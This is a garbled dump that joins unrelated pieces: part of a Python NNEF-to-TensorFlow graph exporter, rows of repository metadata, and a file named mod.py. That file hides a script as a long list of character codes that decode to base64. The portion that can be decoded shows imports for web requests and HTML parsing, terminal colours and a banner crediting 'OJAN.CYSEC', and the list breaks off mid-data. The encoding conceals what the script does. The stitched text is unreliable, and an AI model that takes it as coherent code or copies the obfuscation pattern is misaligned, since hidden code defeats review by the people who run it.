if len(end_array) == 1:
tfnode_size.attr['value'].tensor.int_val = end_array[0]
else:
size_array = np.asarray(end_array)
tfnode_size.attr['value'].tensor.tensor_content = np.asarray(size_array, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_size])
tfnode.input.extend([tfnode_begin.name])
tfnode.input.extend([tfnode_size.name])
self.tf_graph.node.extend([tfnode])
def export_softmax(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Softmax')
if len(nnef_node.output_shape) != 2:
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/shape', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = 2
size = 1
for i in range(1,len(nnef_node.output_shape)):
size *= nnef_node.output_shape[i]
new_shape = [nnef_node.output_shape[0], size]
tfnode_shape.attr['value'].tensor.tensor_content = np.asarray(new_shape, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode_reshape = NodeDef(name=self.format_name(nnef_node.name) + '/reshape', op='Reshape')
self.add_input(tfnode_reshape, nnef_node, 'x')
tfnode_reshape.input.extend([self.format_name(nnef_node.name) + '/shape'])
tfnode_reshape.attr['T'].type = 1
tfnode_reshape.attr['Tshape'].type = 3
self.tf_graph.node.extend([tfnode_reshape])
tfnode.input.extend([self.format_name(nnef_node.name) + '/reshape'])
else:
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Softmax')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_softplus(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Softplus')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_softsign(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Softsign')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_split(self, nnef_node):
tfnode_name = nnef_node.name[1:nnef_node.name.find(',')]
tfnode_const = NodeDef(name=self.format_name(tfnode_name) + '/split_dim', op='Const')
tfnode_const.attr['dtype'].type = 3
tfnode_const.attr['value'].tensor.dtype = 3
tfnode_const.attr['value'].tensor.int_val.extend([nnef_node.parameters['axis']])
self.tf_graph.node.extend([tfnode_const])
tfnode = NodeDef(name=self.format_name(tfnode_name), op='Split')
tfnode.input.extend([tfnode_const.name])
self.add_input(tfnode, nnef_node, 'value')
tfnode.attr['T'].type = 1
tfnode.attr['num_split'].i = len(nnef_node.parameters['ratios'])
self.tf_graph.node.extend([tfnode])
def export_sqr(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Square')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_sqrt(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Sqrt')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_sub(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Sub')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_sum_reduce(self, nnef_node):
#Generate const node for axis
tfnode_axes = NodeDef(name=self.format_name(nnef_node.name) + '/axes', op='Const')
tfnode_axes.attr['dtype'].type = 3
array_length = len(nnef_node.parameters['axes'])
new_axes = []
for axis in nnef_node.parameters['axes']:
new_axes.append(self.mapping[axis])
tfnode_axes.attr['value'].tensor.dtype = 3
tfnode_axes.attr['value'].tensor.tensor_shape.dim.add().size = array_length
if array_length == 1:
tfnode_axes.attr['value'].tensor.int_val.extend([new_axes[0]])
else:
tfnode_axes.attr['value'].tensor.tensor_content = np.asarray(new_axes, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_axes])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Sum')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_axes.name])
tfnode.attr['T'].type = 1
tfnode.attr['Tidx'].type = 3
tfnode.attr['keep_dims'].b = False
self.tf_graph.node.extend([tfnode])
def export_tanh(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Tanh')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_transpose(self, nnef_node):
tfnode_perm = NodeDef(name=self.format_name(nnef_node.name) + '/perm', op='Const')
tfnode_perm.attr['dtype'].type = 3
tfnode_perm.attr['value'].tensor.dtype = 3
tfnode_perm.attr['value'].tensor.tensor_shape.dim.add().size = len(nnef_node.parameters['axes'])
tfnode_perm.attr['value'].tensor.tensor_content = np.asarray(nnef_node.parameters['axes'], dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_perm])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Transpose')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_perm.name])
tfnode.attr['T'].type = 1
tfnode.attr['Tperm'].type = 3
self.tf_graph.node.extend([tfnode])
def export_update(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Identity')
self.add_input(tfnode, nnef_node, 'value')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_variable(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Const')
tfnode.attr['dtype'].type = 1
tfnode.attr['value'].tensor.dtype = 1
self.tf_graph.node.extend([tfnode])
| 42.668924
| 153
| 0.572769
| 21,196
| 170,121
| 4.318975
| 0.027694
| 0.099623
| 0.026457
| 0.020154
| 0.826359
| 0.786979
| 0.761145
| 0.734895
| 0.703315
| 0.683303
| 0
| 0.010776
| 0.306112
| 170,121
| 3,986
| 154
| 42.679629
| 0.764734
| 0.008976
| 0
| 0.642654
| 0
| 0
| 0.053196
| 0.002369
| 0
| 0
| 0
| 0
| 0.005055
| 1
| 0.054344
| false
| 0
| 0.031912
| 0.00158
| 0.121959
| 0.002528
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
81c06b6b1cc377ad96f8428f6c700c7af6a704f7
| 177
|
py
|
Python
|
src/resources/__init__.py
|
kumardeepak/user-mgmt
|
43f37fd1bf0a21ae3d17126b21e0b906145ecaf6
|
[
"MIT"
] | null | null | null |
src/resources/__init__.py
|
kumardeepak/user-mgmt
|
43f37fd1bf0a21ae3d17126b21e0b906145ecaf6
|
[
"MIT"
] | null | null | null |
src/resources/__init__.py
|
kumardeepak/user-mgmt
|
43f37fd1bf0a21ae3d17126b21e0b906145ecaf6
|
[
"MIT"
] | null | null | null |
from .user_admin import UserAdminLoginResource, UserAdminRegisterResource
from .user_serviceprovider import UserServiceProviderLoginResource, UserServiceProviderRegisterResource
| 88.5
| 103
| 0.926554
| 12
| 177
| 13.5
| 0.75
| 0.098765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 177
| 2
| 103
| 88.5
| 0.964286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c49990c8a150c5ccf6a87fc1058abc5ed0029651
| 26,660
|
py
|
Python
|
mod.py
|
TUANB4JAX/CyMod
|
c6c02f1213e6134aadc9b259fe87cb30e7f6ffb1
|
[
"MIT"
] | null | null | null |
mod.py
|
TUANB4JAX/CyMod
|
c6c02f1213e6134aadc9b259fe87cb30e7f6ffb1
|
[
"MIT"
] | null | null | null |
mod.py
|
TUANB4JAX/CyMod
|
c6c02f1213e6134aadc9b259fe87cb30e7f6ffb1
|
[
"MIT"
] | null | null | null |
import codecs,base64
htr = [97, 87, 49, 119, 98, 51, 74, 48, 73, 71, 112, 122, 98, 50, 52, 75, 90, 110, 74, 118, 98, 83, 66, 121, 90, 88, 70, 49, 90, 88, 78, 48, 99, 121, 66, 112, 98, 88, 66, 118, 99, 110, 81, 103, 85, 50, 86, 122, 99, 50, 108, 118, 98, 103, 112, 109, 99, 109, 57, 116, 73, 71, 57, 122, 73, 71, 108, 116, 99, 71, 57, 121, 100, 67, 66, 122, 101, 88, 78, 48, 90, 87, 48, 103, 89, 88, 77, 103, 89, 50, 49, 107, 67, 109, 90, 121, 98, 50, 48, 103, 89, 110, 77, 48, 73, 71, 108, 116, 99, 71, 57, 121, 100, 67, 66, 67, 90, 87, 70, 49, 100, 71, 108, 109, 100, 87, 120, 84, 98, 51, 86, 119, 73, 71, 70, 122, 73, 71, 74, 122, 67, 109, 90, 121, 98, 50, 48, 103, 99, 72, 74, 108, 100, 72, 82, 53, 100, 71, 70, 105, 98, 71, 85, 103, 97, 87, 49, 119, 98, 51, 74, 48, 73, 70, 66, 121, 90, 88, 82, 48, 101, 86, 82, 104, 89, 109, 120, 108, 67, 103, 112, 106, 98, 71, 70, 122, 99, 121, 66, 51, 79, 103, 111, 103, 73, 67, 65, 103, 73, 121, 66, 68, 98, 50, 120, 118, 99, 103, 111, 103, 73, 67, 65, 103, 81, 107, 120, 66, 81, 48, 115, 103, 80, 83, 65, 110, 88, 68, 65, 122, 77, 49, 115, 53, 77, 71, 48, 110, 67, 105, 65, 103, 73, 67, 66, 83, 82, 85, 81, 103, 80, 83, 65, 110, 88, 68, 65, 122, 77, 49, 115, 53, 77, 87, 48, 110, 67, 105, 65, 103, 73, 67, 66, 72, 85, 107, 86, 70, 84, 105, 65, 57, 73, 67, 100, 99, 77, 68, 77, 122, 87, 122, 107, 121, 98, 83, 99, 75, 73, 67, 65, 103, 73, 70, 108, 70, 84, 69, 120, 80, 86, 121, 65, 57, 73, 67, 100, 99, 77, 68, 77, 122, 87, 122, 107, 122, 98, 83, 99, 75, 73, 67, 65, 103, 73, 69, 74, 77, 86, 85, 85, 103, 80, 83, 65, 110, 88, 68, 65, 122, 77, 49, 115, 53, 78, 71, 48, 110, 67, 105, 65, 103, 73, 67, 66, 81, 86, 86, 74, 81, 84, 69, 85, 103, 80, 83, 65, 110, 88, 68, 65, 122, 77, 49, 115, 53, 78, 87, 48, 110, 67, 105, 65, 103, 73, 67, 66, 68, 87, 85, 70, 79, 73, 68, 48, 103, 74, 49, 119, 119, 77, 122, 78, 98, 79, 84, 90, 116, 74, 119, 111, 103, 73, 67, 65, 103, 82, 49, 74, 66, 87, 83, 65, 57, 73, 67, 100, 99, 77, 68, 77, 122, 87, 122, 107, 51, 98, 83, 99, 75, 67, 105, 65, 103, 73, 67, 65, 106, 73, 70, 78, 48, 101, 87, 120, 108, 67, 105, 65, 103, 73, 67, 66, 67, 84, 48, 120, 69, 73, 68, 48, 103, 74, 49, 119, 119, 77, 122, 78, 98, 77, 87, 48, 110, 67, 105, 65, 103, 73, 67, 66, 86, 84, 107, 82, 70, 85, 107, 120, 74, 84, 107, 85, 103, 80, 83, 65, 110, 88, 68, 65, 122, 77, 49, 115, 48, 98, 83, 99, 75, 67, 105, 65, 103, 73, 67, 65, 106, 73, 69, 74, 104, 89, 50, 116, 110, 99, 109, 57, 49, 98, 109, 82, 68, 98, 50, 120, 118, 99, 103, 111, 103, 73, 67, 65, 103, 81, 109, 100, 67, 84, 69, 70, 68, 83, 121, 65, 57, 73, 67, 100, 99, 77, 68, 77, 122, 87, 122, 81, 119, 98, 83, 99, 75, 73, 67, 65, 103, 73, 69, 74, 110, 85, 107, 86, 69, 73, 68, 48, 103, 74, 49, 119, 119, 77, 122, 78, 98, 78, 68, 70, 116, 74, 119, 111, 103, 73, 67, 65, 103, 81, 109, 100, 72, 85, 107, 86, 70, 84, 105, 65, 57, 73, 67, 100, 99, 77, 68, 77, 122, 87, 122, 81, 121, 98, 83, 99, 75, 73, 67, 65, 103, 73, 69, 74, 110, 84, 49, 74, 66, 84, 107, 100, 70, 73, 68, 48, 103, 74, 49, 119, 119, 77, 122, 78, 98, 78, 68, 78, 116, 74, 119, 111, 103, 73, 67, 65, 103, 81, 109, 100, 67, 84, 70, 86, 70, 73, 68, 48, 103, 74, 49, 119, 119, 77, 122, 78, 98, 78, 68, 82, 116, 74, 119, 111, 103, 73, 67, 65, 103, 81, 109, 100, 81, 86, 86, 74, 81, 84, 69, 85, 103, 80, 83, 65, 110, 88, 68, 65, 122, 77, 49, 115, 48, 78, 87, 48, 110, 67, 105, 65, 103, 73, 67, 66, 67, 90, 48, 78, 90, 81, 85, 52, 103, 80, 83, 65, 110, 88, 68, 65, 122, 77, 49, 115, 48, 78, 109, 48, 110, 67, 105, 65, 103, 73, 67, 66, 67, 90, 48, 100, 83, 81, 86, 107, 103, 80, 83, 65, 110, 88, 68, 65, 122, 77, 49, 115, 48, 78, 50, 48, 110, 67, 103, 111, 103, 73, 67, 65, 103, 73, 121, 66, 70, 98, 109, 81, 75, 73, 67, 65, 103, 73, 69, 86, 79, 82, 67, 65, 57, 73, 67, 100, 99, 77, 68, 77, 122, 87, 122, 66, 116, 74, 119, 111, 75, 90, 71, 86, 109, 73, 71, 74, 104, 98, 109, 53, 108, 99, 105, 103, 112, 79, 103, 111, 103, 73, 67, 65, 103, 99, 72, 74, 112, 98, 110, 81, 111, 90, 105, 99, 110, 74, 51, 116, 51, 76, 107, 100, 83, 82, 85, 86, 79, 102, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 65, 103, 43, 75, 65, 103, 43, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 81, 114, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 102, 105, 108, 90, 114, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 102, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 102, 105, 103, 73, 80, 105, 103, 73, 80, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 102, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 102, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 102, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 68, 105, 108, 90, 68, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 99, 75, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 85, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 88, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 88, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 111, 67, 68, 52, 111, 67, 68, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 85, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 85, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 88, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 88, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 97, 73, 52, 112, 87, 85, 52, 112, 87, 100, 67, 117, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 107, 101, 75, 87, 107, 101, 75, 86, 109, 117, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 110, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 86, 109, 117, 75, 86, 107, 79, 75, 86, 107, 79, 75, 86, 107, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 107, 79, 75, 86, 107, 79, 75, 86, 110, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 43, 75, 65, 103, 43, 75, 65, 103, 43, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 86, 109, 117, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 110, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 107, 79, 75, 86, 107, 79, 75, 86, 110, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 107, 79, 75, 86, 107, 79, 75, 86, 110, 101, 75, 87, 107, 101, 75, 87, 107, 101, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 79, 75, 86, 107, 79, 75, 86, 107, 79, 75, 87, 105, 79, 75, 87, 105, 79, 75, 86, 108, 119, 114, 105, 108, 90, 114, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 102, 105, 108, 90, 114, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 103, 73, 80, 105, 103, 73, 80, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 112, 72, 105, 108, 90, 114, 105, 108, 90, 68, 105, 108, 90, 51, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 90, 114, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 84, 105, 108, 90, 51, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 102, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 72, 105, 108, 112, 72, 105, 108, 112, 72, 105, 108, 111, 106, 105, 108, 111, 106, 105, 108, 90, 69, 75, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 111, 67, 68, 52, 111, 67, 68, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 52, 112, 97, 82, 52, 112, 97, 82, 52, 112, 87, 97, 52, 112, 87, 81, 52, 112, 87, 100, 67, 103, 111, 103, 73, 67, 65, 103, 73, 67, 65, 103, 73, 72, 116, 51, 76, 108, 74, 70, 82, 72, 49, 98, 101, 51, 99, 117, 82, 85, 53, 69, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 100, 106, 69, 117, 77, 72, 116, 51, 76, 108, 74, 70, 82, 72, 49, 100, 101, 51, 99, 117, 82, 85, 53, 69, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 73, 69, 90, 80, 84, 69, 120, 80, 86, 121, 66, 74, 84, 108, 78, 85, 81, 85, 100, 83, 81, 85, 48, 103, 81, 86, 86, 85, 83, 69, 57, 83, 73, 69, 66, 80, 83, 107, 70, 79, 76, 107, 78, 90, 85, 48, 86, 68, 101, 51, 99, 117, 82, 85, 53, 69, 102, 83, 99, 110, 74, 121, 107, 75, 67, 109, 78, 116, 90, 67, 103, 110, 89, 50, 120, 108, 89, 88, 73, 110, 75, 81, 112, 105, 89, 87, 53, 117, 90, 88, 73, 111, 75, 81, 112, 119, 99, 109, 108, 117, 100, 67, 104, 109, 74, 121, 99, 110, 67, 110, 116, 51, 76, 108, 74, 70, 82, 72, 49, 98, 101, 51, 99, 117, 82, 85, 53, 69, 102, 88, 116, 51, 76, 107, 74, 80, 84, 69, 82, 57, 77, 88, 116, 51, 76, 108, 74, 70, 82, 72, 49, 100, 